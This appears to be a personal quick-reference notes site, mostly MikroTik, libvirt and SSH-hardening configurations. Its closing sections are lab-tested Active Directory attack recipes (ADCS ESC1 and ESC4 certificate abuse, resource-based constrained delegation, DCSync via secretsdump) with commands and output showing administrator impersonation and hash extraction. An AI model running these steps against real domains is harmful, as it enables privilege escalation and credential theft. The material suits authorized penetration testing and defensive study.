Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

ABOUT

About

Introduction

Usually documentation (if any) of certain utilities and applications is too verbose and there is no indication whether certain information has higher priority and/or is used more often. Furthermore, when you attempt to use the technology, it often fails to work as described under the given conditions.

Because of this I’ve decided to create this repository to document tested techniques and practical usage examples for different types of technology I come across in a form of quick references.

Development

This is very far from being complete: I will be slowly populating this repository with content from my local notes, I have lots of things to share.

All content on this blog is intended solely for educational purposes, research, authorized assessments. The author assumes no responsibility for any misuse of the information provided.

VPLS

MT ROS setup

# R1 (IP : 10.0.0.1)
/interface/bridge/add name=vpls-tun-1
# vpls-id is just a tunnel identifier, you can use whatever, but people usually use their AS number
# note the X:X format !!!
/interface/vpls/add name=vpls-tun-4-3 vpls-id=1:102 peer=10.0.0.2

## join route-to-customer and vpls-tunnel together using a bridge
#  add vpls tunnel to bridge
/interface/bridge/port/add interface=vpls-tun-4-3 bridge=vpls-tun-1
# add customer-facing interface to a bridge
/interface/bridge/port/add interface=ether4 bridge=vpls-tun-1


# R2 (IP : 10.0.0.2)
/interface/bridge/add name=vpls-tun-1
/interface/vpls/add name=vpls-tun-4-3 vpls-id=1:102 peer=10.0.0.1
/interface/bridge/port/add interface=vpls-tun-4-3 bridge=vpls-tun-1
/interface/bridge/port/add interface=ether4 bridge=vpls-tun-1

# check
/interface/vpls/monitor


# clients now can set an address on upstream interfaces (that're connected to your routers) and communicate with each other on the same subnet (ofc you do NOT need to set any addresses on your routers)

VXLAN

MT ROS setup

#### customer router
### on customer's side you CAN also configure VLANs to separate traffic

### R1 (IP : 10.0.0.1)
/interface vxlan add name=vxlan-vni-102 vni=102
/interface vxlan vteps add interface=vxlan-vni-102 remote-ip=10.0.0.2
/interface/bridge/add name=vxlan-br-102
# ether12 goes to customer's router
/interface/bridge/port/add interface=ether12 bridge=vxlan-br-102
/interface/bridge/port/add interface=vxlan-vni-102 bridge=vxlan-br-102

### R2 (IP : 10.0.0.2)
/interface vxlan add name=vxlan-vni-102 vni=102
/interface vxlan vteps add interface=vxlan-vni-102 remote-ip=10.0.0.1
/interface/bridge/add name=vxlan-br-102
# ether12 goes to customer's router
/interface/bridge/port/add interface=ether12 bridge=vxlan-br-102
/interface/bridge/port/add interface=vxlan-vni-102 bridge=vxlan-br-102

Wireguard

WG tunnel to LAN on MT ROS & debian

/interface/wireguard/add listen-port=13231 name=wireguard1
# this is the subnet that the client will "tunnel out of"
# each client must have allowed-address from 192.168.100.1/24
/ip/address/add address=192.168.100.1/24 interface=wireguard1

# [admin@home] > /interface wireguard print 
#     Flags: X - disabled; R - running 
#      0  R name="wireguard1" mtu=1420 listen-port=11111 private-key="SERVER_PRIVATE_KEY"
#           public-key="SERVER_PUBLIC_KEY"

/interface/wireguard/peers/add allowed-address=192.168.100.2/32 interface=wireguard1 public-key="CLIENT_PUBLIC_KEY" preshared-key="PEER_PSK"

/ip/firewall/filter/add action=accept chain=input comment="allow WireGuard" dst-port=11111 protocol=udp place-before=1
/interface/list/member/add interface=wireguard1 list=LAN

/ip/firewall/nat/add action=src-nat chain=srcnat src-address=192.168.100.0/24 to-addresses=192.168.88.1

Connect from debian:

wg genkey | sudo tee /etc/wireguard/private.key
sudo cat /etc/wireguard/private.key | wg pubkey | sudo tee /etc/wireguard/public.key
wg genkey | sudo tee /etc/wireguard/preshared.key

sudo nvim /etc/wireguard/wg0.conf
# [Interface]
# PrivateKey = CLIENT_PUBLIC_KEY
# # this clients address on the destination device
# Address = 192.168.100.2/32
# DNS = 192.168.100.1
# 
# [Peer]
# PresharedKey = PEER_PSK
# PublicKey = SERVER_PUBLIC_KEY
# # defines which dst-address will go through the tunnel
# # example: AllowedIPs = 0.0.0.0/0
# AllowedIPs = 192.168.100.0/24, 192.168.88.0/24
# Endpoint = xxx.xxx.xxx.xxx:11111

# or nm-connection-editor
sudo nmcli connection import type wireguard file /etc/wireguard/wg0.conf
nmcli connection
# or using wg-quick
wg-quick up wg0

DNS

DoH

MT ROS setup

# set the cloudflare server ("servers" is to resolve the DoH server itself, use-doh-server is a DoH server address)
# after DoH server address is resolved all other DNS requests will be made via DoH
/ip/dns/set verify-doh-cert=yes allow-remote-requests=yes doh-max-concurent-queries=100 doh-max-server-connections=20 doh-timeout=6s servers=1.1.1.1 use-doh-server=https://cloudflare-dns.com/dns-query

# fetch the downloaded cert chain
/tool/fetch url=http://192.168.60.1:9595/one-one-one-chain.pem
/file/print

/certificate/import file-name=one-one-one-chain.pem
# certificates-imported: 3

Misc

MT ROS update static DNS entries from DHCP

/system/script/add name=update-dns-from-dhcp policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive source="
:local domain ".aperture.ad";
:local leases [/ip dhcp-server lease find dynamic=yes];

:foreach i in=[/ip dns static find where name~$domain] do={
    /ip dns static remove $i;
}

:foreach i in=$leases do={
    :local hostname [/ip dhcp-server lease get $i host-name];
    :local address [/ip dhcp-server lease get $i address];

    :if ([:len $hostname] > 0) do={
        :local fqdn ($hostname . $domain);
        /ip dns static add name=$fqdn address=$address ttl=5m comment="From DHCP lease";
    }
}
"

/system scheduler add name=update-dns-from-dhcp interval=5m on-event="/system script run update-dns-from-dhcp"

DRP

BFD

MT ROS setup

# enable BFD on interfaces (you can just use interfaces=all)
# `min-tx/min-rx = 1` means 1 second interval
/routing/bfd/configuration/add interfaces=ether5,ether6,ether7,ether8 min-tx=1 min-rx=1
# then in OSPF/BGP/whatever config set use-bfd=yes on an interface so that it will send BFD hello packets

OSPF

MT ROS setup

# create a loopback for fault tolerance
/interface/bridge/add name=Lo0

# first assign IP addresses
/ip/address/add interface=Lo0 address=10.0.0.4/32
/ip address add address=192.168.0.3/24 interface=ether1
/ip address add address=192.168.1.3/24 interface=ether2

/routing ospf instance add name=ospfv2-inst version=2 router-id=10.0.0.4
# area-id is usually, 0.0.0.0, 1.1.1.1, 2.2.2.2, etc.
/routing ospf area add name=ospfv2-a0 area-id=0.0.0.0 instance=ospfv2-inst

### if interfaces are not specified ROS will detect automatically!
### use-bfd can be ommited! if it's not - see *BFD for bfd configuration
/routing ospf interface-template add networks=192.168.0.0/24,192.168.1.0/24,10.0.0.4/32 area=ospfv2-a0 interfaces=ether3,bond-9-2,Lo0 use-bfd=yes

# allow ospf traffic (is not needed if no rules are present)
/ip firewall filter add action=accept chain=input protocol=ospf

FHRP

VRRP

MT ROS setup

  1. vrid is an ID of a VIRTUAL router, each needs to have a unique ID.
  2. authentication=none is default (TODO) non-none values are only supported if version != 3
  3. priority=100 is default (Higher priority wins!)
  4. Upon entering a backup state the IP address assigned to VRRP interface SHOULD become Invalid, this is expected!
#    |----|          |----|  
#    | R1 |          | R2 |
#    |----| ether2   |----|
#       |  \__    __/  | <------ ether1
#       |     \__/     |
#    |----|___/  \___|----|      
#    | S1 |          | S2 |
#    |----|==========|----|


### R2:
# OPT: real iface address:
/ip address add address=192.168.1.1/24 interface=ether1

# can be assigned on VLAN interface (interface=vlan-20)
/interface vrrp add name=vrrp-1 interface=ether1 vrid=1 priority=250
/interface vrrp add name=vrrp-1 interface=ether1 vrid=1 priority=250 authentication=ah password=somepass1 version=2
# OPT: if you have multiple gateways on downstream switches:
/interface vrrp add name=vrrp-2 interface=ether1 vrid=2 priority=240 authentication=ah password=somepass2 version=2
# OPT: if you have multiple downstream nodes interconnected with VRRP routers in mesh for redundancy:
# priorities should be set to higher values on a master router. vrid should be the same on all interfaces that have
# the same VIP address
/interface vrrp add name=vrrp-3 interface=ether2 vrid=1 priority=230 authentication=ah password=somepass1 version=2

# virtual addresses (HAVE TO BE /32):
# you CAN assign multiple ip addresses to a single VRRP interface and single VRID
/ip address add address=192.168.1.101/32 interface=vrrp-1
# OPT: if you have multiple gateways on downstream switches:
/ip address add address=10.10.1.102/32 interface=vrrp-2
# OPT: if you have multiple downstream nodes interconnected with VRRP routers in mesh for redundancy:
/ip address add address=192.168.1.101/32 interface=vrrp-3

VLAN

MT ROS setup

frame-types:

# only tagged traffic will be send out (set this on trunk ports) 
# (if you send it on bridge it means that only tagged traffic will be send OUT OF THE TRUNK PORT)
# be carefull setting this because you will not be able to send packets from the router itself out of trunk ports
frame-types=admit-only-vlan-tagged

# only untagged traffic will be send out (set this on access ports)
frame-types=admit-only-untagged-and-priority-tagged

VLAN switching:

# {https://forum.mikrotik.com/viewtopic.php?t=180903}
# add bridge for vlan switching (a single bridge should be used generaly (if multiple bridges are used - bringing will not be able to be hardware-offloaded (i.e. more CPU load)))
/interface/bridge/add name=vlan-br-1 vlan-filtering=yes # WARNING!!! if you're connected to router remotely FIRST OMIT vlan-filtering option, since it will break the connection
# priority=0x5000 - possible if you wanna adjust STP (or MSTP/RSTP) priority value (the lower the priority the more chance it'll become the root bridge)
# frame-types=admit-only-vlan-tagged - POSSIBLE, BUT DANGEROUS

# attach physical interface to a virtual bridge interface (trunk). Don't forget to add appropriate bridge VLAN table entries
/interface/bridge/port/add bridge=vlan-br-1 interface=ether1
# frame-types=admit-only-vlan-tagged - POSSIBLE, BUT DANGEROUS (not required)

# attach physical interface to a virtual bridge interface (access). Don't forget to add appropriate bridge VLAN table entries
/interface/bridge/port/add bridge=vlan-br-1 interface=ether2 pvid=20
/interface/bridge/port/add bridge=vlan-br-1 interface=ether3 pvid=30
# frame-types=admit-only-untagged-and-priority-tagged - POSSIBLE, BUT DANGEROUS (not required)

# add a bridge VLAN table entry for each bridge port (if multiple interfaces are connected to ONE VLAN specify them), untagged interfaces are ones that will be linked with a VLAN itself
# and set /ip/dns/set allow-remote-requests=yes
# REPEAT that sequence on each switch that stands in a way
/interface/bridge/vlan/add bridge=vlan-br-1 tagged=ether1,vlan-br-1 untagged=ether2 vlan-ids=20
/interface/bridge/vlan/add bridge=vlan-br-1 tagged=ether1,vlan-br-1 untagged=ether3,ether4 vlan-ids=30

# Add a vlan interface (enable VLAN tagging for a particular VLAN (10) on a specific interface (ether2)) (don't forget to add an address to it and a coresponding entry in a bridge-VLAN table afterwards)
/interface/vlan/add name=vlan-20 vlan-id=20 interface=vlan-br-1
/interface/vlan/add name=vlan-30 vlan-id=30 interface=vlan-br-1
# add upstream address for clients
/ip/address/add address=10.10.20.1/24 interface=vlan-20 # don't forget to write different addresses on second router for VRRP
/ip/address/add address=10.10.30.1/24 interface=vlan-30


# on each router / managed switch that stands in a way enable NAT masquerade
/ip/firewall/nat/add chain=srcnat out-interface=vlan-br-1 action=masquerade


# afterwards you can create a dhcp server (interface=vlanX)
ip/pool/add name=vlan-20-pool ranges=192.168.20.100-192.168.20.200
/ip/dhcp-server/add interface=vlan-20 address-pool=vlan20-pool name=vlan-20-dhcp
/ip/dhcp-server/network/add address=192.168.20.0/24 dns-server=192.168.20.1 gateway=192.168.20.1 netmask=24
ip/pool/add name=vlan-30-pool ranges=192.168.30.100-192.168.30.200
/ip/dhcp-server/add interface=vlan-30 address-pool=vlan30-pool name=vlan-30-dhcp
/ip/dhcp-server/network/add address=192.168.30.0/24 dns-server=192.168.30.1 gateway=192.168.30.1 netmask=24

## if you're configuring VXLAN - clients should already be able to reach each other on both sides of VXLAN
## if you want your routers to be reachable, on both routers assign single-subnet address ON A BRIDGE
# R1
/ip/address/add address=172.16.102.1/24 interface=vlan-br-1
# R2
/ip/address/add address=172.16.102.2/24 interface=vlan-br-1

OPTIONAL: add VRRP

### MIRROR THIS CONFIGURATION ON A SECOND ROUTER, BUT WITH DIFFERENT PRIORITY
/interface vrrp add name=vrrp-m-20 interface=vlan-20 vrid=20 priority=200
/interface vrrp add name=vrrp-m-30 interface=vlan-30 vrid=30 priority=200

# pay attention: addresses should be reachable from clients on VLAN
# This SHOULD be /32 !!!
/ip address add address=192.168.20.3/32 interface=vrrp-m-20
/ip address add address=192.168.30.3/32 interface=vrrp-m-30

/ip/dhcp-server/network/add address=192.168.20.0/24 gateway=192.168.20.3 dns-server=192.168.20.3
/ip/dhcp-server/network/add address=192.168.30.0/24 gateway=192.168.30.3 dns-server=192.168.30.3

OPTIONAL: VLAN isolation

add action=drop chain=forward dst-address=192.168.55.0/27 src-address=192.168.80.0/24

BGP

eBGP

MT ROS setup

# make router-id a local router loopback address (optional)
# remote.as if not specified will be automatically determined
/routing/bgp/connection/add name=bgp-65100 as=65200 router-id=10.0.0.3 remote.address=38.65.83.201 remote.as=65100 local.role=ebgp local.address=20.84.87.139 connect=yes listen=yes
# now, mirror this config for 2nd router (AS 65100) and the entry should appear under:
/routing/bgp/session/print

# eBGP functions now, but doesn't do anything
# in order for you and your eBGP to actually learn some routers from the remote network you need to configure routers on both peers (e.g. on both AS') to contain the "output.network" setting.
/routing/bgp/connection/set numbers=0 output.network=bgp-65100-out
/ip/firewall/address-list/add list=bgp-65100-out address=10.3.1.0/24
/ip/firewall/address-list/add list=bgp-65100-out address=10.3.2.0/24
# try to check /ip/route/print on the AS65100 router, you should learn routes you advertised here
# now, mirror this config for the 2nd router (AS 65100) and set the required routes for it to advertise to the AS65200 router

ARP

Harvesting

arp-scan

arp-scan -i 100 -I eth0 192.168.0.0/16

MikroTik RouterOS

MAC TELNET

/ip/service/enable numbers=telnet
/interfaces/print

sudo apt install mactelnet-client
mactelnet $MAC

flash

sudo nvim /etc/network/interfaces
# auto enx00e04c36350d
# iface enx00e04c36350d inet static
#     address 192.168.88.2/24
#     gateway 192.168.2.1

sudo systemctl restart networking

sudo ./netinstall-cli -r -a 192.168.88.1 mt/routeros-7.20-arm64.npk mt/container-7.20-arm64.npk mt/user-manager-7.20-arm64.npk mt/wifi-qcom-7.20-arm64.npk

# connect to WAN port

# now you can proceed to boot the device into EtherBoot mode (poweron the device while holding reset button until it stops blinking)

ssh by key

/file/add name=mtusr.pub contents="ssh-ed25519 thisismypublickey usr@debian" type=file
/user ssh-keys import public-key-file=mtusr.pub user=mtusr
/ip ssh set strong-crypto=yes
/ip ssh set always-allow-password-login=no

Libvirt networking

Misc

Create an isolated network

<network>
  <name>fcos_k8s_lab</name>
  <uuid>280c4dd6-e5e4-478b-aa71-6d7aaa326eae</uuid>
  <forward mode='nat'/>
  <bridge name='k8sbr0' stp='on' delay='0'/>
  <mac address='52:54:00:fd:d7:c7'/>
  <domain name='k8s.local'/>
  <dns enable='yes'>
    <forwarder addr='1.1.1.1'/>
  </dns>
  <ip family='ipv4' address='192.168.122.1' prefix='24'>
    <dhcp>
      <range start='192.168.122.2' end='192.168.122.254'/>
      <!-- <host mac='50:73:0F:31:81:E1' name='coreos01' ip='192.168.122.101'/> -->
      <!-- <host mac='50:73:0F:31:81:E2' name='coreos02' ip='192.168.122.102'/> -->
      <!-- <host mac='50:73:0F:31:81:F1' name='coreos03' ip='192.168.122.103'/> -->
      <!-- <host mac='50:73:0F:31:81:F2' name='coreos04' ip='192.168.122.104'/> -->
    </dhcp>
  </ip>
</network>

attach multiple interfaces to 1 host

### ATTACH A BRIDGE TO HOST/ANOTHER VM
# this will create the corresponding virtual NIC on a VM
# get rid of --persistent if you just want a temporary interface
# virbr15 is the VNI for the network you wanna attach. You can create it manually using `ip`
virsh attach-interface --type bridge --source virbr15 --model virtio --domain mt-chr-1 --persistent

### ATTACH TO A NETWORK
# this network needs to be created with libvirt as a 'network'
virsh attach-interface --type network --source ad_lab --model virtio --domain mt-chr-1 --persistent

basic network definition template

You may use virsh net-define /usr/share/libvirt/networks/default.xml to define an initial network configuration.

<network>
  <name>advenv_net</name>
<!-- ensure UUID is valid -->
  <uuid>dcd932a5-6ba1-4d46-b56e-2c7ec8722e58</uuid>
  <forward mode='nat'/>
<!-- this bridge interface will be created automatically by libvirt  -->
<!-- and all virtual tap/tun VM's interfaces will be attached to it also automatically -->
  <bridge name='virbr1' stp='on' delay='0'/>
<!-- ensure MAC is valid -->
  <mac address='52:54:00:ff:a0:64'/>
  <domain name='advenv.local'/>
  <dns enable='no'/>
<!-- CIDR for a bridge interface -->
  <ip family='ipv4' address='10.0.100.1' prefix='24'>
<!-- DHCP rules -->
    <dhcp>
      <range start='10.0.100.2' end='10.0.100.254'/>
<!-- host mapping is OPTIONAL -->
      <host mac='52:54:00:52:D8:3A' name='dc-2' ip='10.0.100.2'/>
      <host mac='b0:ee:79:6d:50:3f' name='debian1' ip='10.0.100.15'/>
      <host mac='aa:df:3a:fe:eb:a4' name='debian2' ip='10.0.100.20'/>
    </dhcp>
  </ip>
</network>

bridge a libvirt guest domain to physical LAN

Scenario:

  • DHCP server is running on physical router
  • debian host running libvirtd (host’s address == 192.168.1.69)
  • debian libvirt/qemu VM (VM’s address == 192.168.1.100)
sudo apt install bridge-utils

# on the host
sudo vim /etc/network/interfaces
# auto br0
# iface br0 inet static
#     address 192.168.1.69/24
#     gateway 192.168.1.1
#     bridge_ports enp3s0
#     bridge_stp off
#     bridge_fd 0
#     bridge_maxwait 0

# on the VM
sudo vim /etc/network/interfaces
# auto enp1s0
# iface enp1s0 inet static
#     address 192.168.1.100/24
#     gateway 192.168.1.1

# VM (domain) definition
virsh edit dc-1
# <interface type='bridge'>
#   <source bridge='br0'/>
#   <model type='virtio'/>
# </interface>

# on the host
sudo systemctl restart systemd-networkd

# ensure correct interface layout on host
ip a
# 2: enp3s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel master br0 state UP group default qlen 1000
#     link/ether 74:56:3c:91:53:35 brd ff:ff:ff:ff:ff:ff
#     altname enx74563c915335
# 3: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
#     link/ether ee:58:46:54:ea:9c brd ff:ff:ff:ff:ff:ff
#     inet 192.168.1.69/24 brd 192.168.1.255 scope global br0
#        valid_lft forever preferred_lft forever
#     inet6 fe80::ec58:46ff:fe54:ea9c/64 scope link proto kernel_ll
#        valid_lft forever preferred_lft forever

# on VM
ip a
# 2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
#     link/ether 52:54:00:eb:a8:c2 brd ff:ff:ff:ff:ff:ff
#     altname enx525400eba8c2
#     inet 192.168.1.100/24 brd 192.168.1.255 scope global enp1s0
#        valid_lft forever preferred_lft forever
#     inet6 fe80::5054:ff:feeb:a8c2/64 scope link proto kernel_ll
#        valid_lft forever preferred_lft forever

Troubleshooting

fix NAT issues (nftables)

fix libvirt domains’ traffic on NAT networks not being masqueraded

cat /etc/default/ufw | grep DEFAULT_FORWARD_POLICY
# DEFAULT_FORWARD_POLICY="DROP" -------> ACCEPT
DEFAULT_FORWARD_POLICY="ACCEPT"

ufw reload

Fix libvirt domains’ traffic on NAT networks not being masqueraded if libvirt is using nftables backend (e.g. on fedora42 where iptables is deprecated)

sudo grep 'firewall_backend' /etc/libvirt/network.conf
# firewall_backend = "nftables"

# 1) attempt to purge nftables ruleset
sudo nft flush ruleset

# 2.1) ensure firewalld (or whatever frontend you are using) repopulates nft ruleset
sudo systemctl restart firewalld
# 2.2) ensure libvirtd is started before libvirt_network is started
sudo systemctl restart libvirtd

# 3) ensure nftables ruleset is repopulated by firewalld
sudo nft list ruleset

# 4) ensure kernel forwarding is enabled
sysctl net.ipv4.ip_forward
# net.ipv4.ip_forward = 1

# 5) start all necessary resources
virsh net-start --network default
virsh start debian-tmp-1
virsh console --domain debian-tmp-1
# ping 1.1.1.1

fix libvirt dnsmasq address already in use issue

sudo rc-update del dnsmasq
sudo rc-service dnsmasq stop

OR

# make dnsmasq listen on specific interface
interface=eth0
# OR make dnsmasq listen on specific address
listen-address=192.168.0.1

# AND uncomment this line
bind-interfaces

SSHD

Reasonably secure setup

  1. Change sshd security settings
######## /etc/ssh/sshd_config
### do NOT install sudo

### DISABLE ROOT LOGIN
AllowUsers $USERNAME $USERNAME
PermitRootLogin no

### DISABLE PASSWORD AUTHENTICATION
PasswordAuthentication no
KbdInteractiveAuthentication no
UsePAM no
PubkeyAuthentication yes

### REQUIRE BOTH PASSWORD AND PRIVATE KEY
AuthenticationMethods "publickey,password"
PasswordAuthentication yes

### change default port
Port 5555
  1. Enable FW
ufw enable
  1. Create an unprivileged user
adduser myuser
  1. Setup autoupdate
### DEBIAN
sudo apt update && sudo apt upgrade
sudo apt install unattended-upgrades

# /etc/apt/apt.conf.d/50unattended-upgrades
# ensure the following are present. (they are present by default)
"origin=Debian,codename=${distro_codename},label=Debian";
"origin=Debian,codename=${distro_codename},label=Debian-Security";
"origin=Debian,codename=${distro_codename}-security,label=Debian-Security";

sudo systemctl start unattended-upgrades
sudo systemctl enable unattended-upgrades

# observe
cat /var/log/unattended-upgrades/unattended-upgrades.log

  1. Setup port knocking
# install knockd
apt install knockd

### /etc/knockd.conf
[options]
UseSyslog
Interface = enp3s0

[SSH]
sequence    = 7000,8000,9000
seq_timeout = 5
tcpflags    = syn
start_command = ufw allow from %IP% to any port 5555
stop_command = ufw delete allow from %IP% to any port 5555
cmd_timeout   = 60


### /etc/default/knockd
START_KNOCKD=1
KNOCKD_OPTS="-i enp3s0"

# usage with port knocking
for ports in 7000 8000 9000; do nmap -Pn --max-retries 0 -p $ports 46.1 $MY_SRV; done
ssh -i $SSH_KEY_PATH -p 5555 myuser@$MY_SRV

ADCS

ESC1

Execute

# enumerate existing templates
certipy-ad find -scheme ldap -u TestAlpha@contoso.org -p 'win10-gui-P@$swd' -dc-ip 192.168.68.64 -stdout -vulnerable -enabled
# Certificate Authorities
#   0
#     CA Name                             : contoso-WIN-KML6TP4LOOL-CA-9
# ...
# 
# Certificate Templates
#   0
#     Template Name                       : Workstation
#     Display Name                        : Workstation Authentication
#     Certificate Authorities             : contoso-WIN-KML6TP4LOOL-CA-9
#     Enabled                             : True
#     Client Authentication               : True
#     Extended Key Usage                  : Client Authentication
#     Requires Manager Approval           : False
#     Validity Period                     : 1 year
#     Renewal Period                      : 6 weeks
#     Minimum RSA Key Length              : 2048
#     Permissions
#       Enrollment Permissions
#         Enrollment Rights               : CONTOSO.ORG\Domain Admins
#                                           CONTOSO.ORG\Authenticated Users
#     [!] Vulnerabilities
#       ESC1                              : 'CONTOSO.ORG\\Domain Computers' and 'CONTOSO.ORG\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
##############
### TEST-1 ### PKINIT not supported
##############
### WARNING ::: you cannot use shadow credentials certificates to logon to LDAP, only legitimately obtained one! it has to be signed with the CA.

certipy-ad req -u TestAlpha@contoso.org -p 'win10-gui-P@$swd' -target WIN-KML6TP4LOOL.contoso.org -ca contoso-WIN-KML6TP4LOOL-CA-9 -template Workstation -upn administrator@contoso.org -dc-ip 192.168.68.64 -debug
# [*] Successfully requested certificate
# [*] Got certificate with UPN 'administrator@contoso.org'
# [*] Saved certificate and private key to 'administrator.pfx'

# attempt to request a TGT using PKINIT
# if you get the following error that means DC's KDC certificate doesn't support PKINIT (because DC's certificate doesn't have "KDC Authentication" EKU)
certipy-ad auth -pfx ./administrator.pfx -dc-ip 192.168.68.64 -domain contoso.org
# [*] Using principal: administrator@contoso.org
# [*] Trying to get TGT...
# [-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

# got an error, so let's authenticate to LDAPS using mTLS then (passthecert.py)
# export public and private keys from a pfx file to a separate files
certipy-ad cert -pfx administrator.pfx -nocert -out administrator.key
# [*] Writing private key to 'administrator.key'
certipy-ad cert -pfx administrator.pfx -nokey -out administrator.cert
# [*] Writing certificate and  to 'administrator.cert'

# use certificates for mTLS LDAPS bind instead of PKINIT. This will rely on LDAP privileges the user has.
python3 ../utils/passthecert.py -action ldap-shell -crt administrator.cert -key administrator.key -domain contoso.org -dc-ip 192.168.68.64
# whoami
# # u:CONTOSO\Administrator


##############
### TEST-2 ### PKINIT supported
##############
# trying to get a TGT using a computer account (WIN-NUU0DPB1BVC) certificate
# the KDC (192.168.68.179) should have a certificate with "KDC Authentication" EKU issued
# after we got a TGT it tries to abuse U2U to itself (*see krb5.norg -> U2U abuse*) 
# in order to retrieve NT hash
certipy-ad auth -pfx ./WIN-NUU0DPB1BVC\$.pfx -dc-ip 192.168.68.179 -domain contoso.org -debug
# [*] Using principal: win-nuu0dpb1bvc$@contoso.org
# [*] Got TGT
# [*] Saved credential cache to 'win-nuu0dpb1bvc.ccache'
# [*] Got hash for 'win-nuu0dpb1bvc$@contoso.org': aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137


# we can request an ST for that computer using hashes
export KRB5CCNAME='win-nuu0dpb1bvc.ccache'
impacket-getST -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 -spn CIFS/WIN-KML6TP4LOOL.contoso.org -dc-ip 192.168.68.64 contoso.org/WIN-NUU0DPB1BVC
# [*] Getting ST for user
# [*] Saving ticket in WIN-NUU0DPB1BVC@CIFS_WIN-KML6TP4LOOL.contoso.org@CONTOSO.ORG.ccache

# let's pass-the-hash to DCSync using impacket-secretsdump
export KRB5CCNAME='WIN-NUU0DPB1BVC@CIFS_WIN-KML6TP4LOOL.contoso.org@CONTOSO.ORG.ccache'
impacket-secretsdump -outputfile contoso.org.dump -k WIN-KML6TP4LOOL.contoso.org

# we can also perform secretsdump using just hashes (NOTE THE '$' SIGN AFTER COMPUTERNAME !!!!)
impacket-secretsdump -outputfile contoso.dump -hashes aad3b435b51404eeaad3b435b51404ee:d0773d3d8ae3a0f436b2b7e649faa137 'CONTOSO.ORG/WIN-NUU0DPB1BVC$@192.168.68.64'


##############
### !!UT!! ###
##############
# scan ADCS for vulnerable templates
Certify.exe find /vulnerable

# request a certificate specifying an "alternative name"
Certify.exe request /ca:ca.domain.local\ca /template:VulnTemplate /altname:TargetUser

# convert a certificate from .pem to .pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# request a TGT for the user using Rubeus
Rubeus.exe asktgt /user:TargetUser /certificate:C:\Temp\cert.pfx

# remember: one session can only contain one TGT - you can use "runas /netonly"

Prerequisites

  1. EKU: Client Authentication
  2. Template has to be enabled
  3. Requires Manager Approval: FALSE
  4. Enrollee Supplies Subject: True
  5. You have to have Enrollment Rights to enroll to that template.

ESC4

Execute

### CERTIPY
# PAY ATTENTION TO "Write Owner Principals", "Write Dacl Principals", "Write Property Principals"
certipy-ad find -scheme ldap -u Administrator@contoso.org -p 'win2016-cli-P@$swd' -dc-ip 192.168.68.64 -stdout

### BLOODHOUND
rusthound -d contoso.org -u 'TestAlpha@contoso.org' -p 'win10-gui-P@$swd' -o /tmp/rusthound.txt -z
#################
### POWERVIEW ###
#################
# CHECK: Retrieve all certificate templates and their ACEs
Get-DomainObjectAcl -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
# if the commands retrieve ActiveDirectoryRights: WriteProperty to a template - you can edit it to your needs

# EDIT TEMPLATE: if you are able to edit the certificate template you can edit it so it will become vulnerable to ESC1
# in order to do it you need change the value of mspki-certificate-name-flag attribute to "1" and add "Client Authentication (1.3.6.1.5.5.7.3.2)" to pkiextendedkeyusage or/and mspki-certificate-application-policy
Set-DomainObject -Identity VulnCert -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -XOR @{'mspki-certificate-name-flag' = '1'}
Set-DomainObject -Identity VulnCert -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" -LDAPFilter "(objectclass=pkicertificatetemplate)" -Set @{'mspki-certificate-application-policy' = '1.3.6.1.5.5.7.3.2', '1.3.6.1.5.5.7.3.4', '1.3.6.1.4.1.311.10.3.4'}

Prerequisites

  1. Template Security Permissions: Owner / WriteOwnerPrincipals / WriteDaclPrincipals / WritePropertyPrincipals.
  2. Template has to be enabled

Delegation

RBCD

Execution

  1. Edit msDS-AllowedToActOnBehalfOfOtherIdentity
###########################
### impacket ldap_shell ###
###########################
# set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
set_rbcd WIN-NUU0DPB1BVC$ TestAlpha


#####################
### impacket-rbcd ###
#####################
  1. Add SPN to current user
# -u == account we're using
# -t == target account
# 192.168.68.64 == DC IP
python3 utils/krbrelayx/addspn.py -u 'CONTOSO\TestAcc' -p 'win2016-cli-P@$swd' -s 'host/testspn.contoso.org' -t 'TestAlpha' 192.168.68.64
  1. Get a TGS for any user to a target service
impacket-getST -spn 'HOST/WIN-NUU0DPB1BVC' -impersonate 'Administrator' -dc-ip 192.168.68.64 'contoso.org/TestAlpha:win10-gui-P@$swd'

Prerequisites

  • victim - account which privileges we’d relay (e.g. DA)
  • desired service - service account to which we’d relay victim’s auth
  • infected account, either fake (newly created specifically for the attack) or owned by an attacker
  1. Desired service account should have an msDS-AllowedToActOnBehalfOfOtherIdentity attribute featuring a infected account’s SPN. (You should be able to create fake machine account (if you do NOT already own one!) and modify target service’s attributes (if it DOESN’T feature your owned account already!)) (not default)
  2. The victim should be not in “Protected Users” group. (default)
  3. The victim should not have an “Account is sensitive and cannot be delegated” attribute set. (default)
  4. Infected account should have an TRUSTED_TO_AUTH_FOR_DELEGATION flag featured in it’s userAccountControl attribute
